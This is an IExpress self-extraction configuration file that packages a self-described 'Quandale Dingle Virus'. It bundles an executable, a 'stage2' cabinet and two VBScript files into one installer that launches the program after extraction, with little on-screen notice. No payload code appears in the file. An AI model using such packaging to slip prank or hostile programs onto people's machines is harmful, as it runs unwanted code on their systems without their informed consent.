[Version]
Class=IEXPRESS
SEDVersion=3
[Options]
PackagePurpose=InstallApp
ShowInstallProgramWindow=0
HideExtractAnimation=0
UseLongFileName=1
InsideCompressed=0
CAB_FixedSize=0
CAB_ResvCodeSigning=0
RebootMode=N
InstallPrompt=%InstallPrompt%
DisplayLicense=%DisplayLicense%
FinishMessage=%FinishMessage%
TargetName=%TargetName%
FriendlyName=%FriendlyName%
AppLaunched=%AppLaunched%
PostInstallCmd=%PostInstallCmd%
AdminQuietInstCmd=%AdminQuietInstCmd%
UserQuietInstCmd=%UserQuietInstCmd%
SourceFiles=SourceFiles
[Strings]
InstallPrompt=
DisplayLicense=
FinishMessage=HEHEHEHAW
TargetName=Y:\QuandaleDingleVirus\zipped\QuandaleDingleVirus.exe
FriendlyName=Quandale Dingle Virus
AppLaunched=QuandaleDingle.exe
PostInstallCmd=cmd.exe /c exit
AdminQuietInstCmd=
UserQuietInstCmd=
FILE0="title.txt"
FILE1="QuandaleDingle.exe"
FILE2="stage2.CAB"
FILE3="copy.vbs"
FILE4="hehehehaw.vbs"
[SourceFiles]
SourceFiles0=Y:\QuandaleDingleVirus\zipped\
SourceFiles1=Y:\QuandaleDingleVirus\QuandaleDingle\
[SourceFiles0]
%FILE0%=
%FILE1%=
[SourceFiles1]
%FILE2%=
%FILE3%=
%FILE4%=
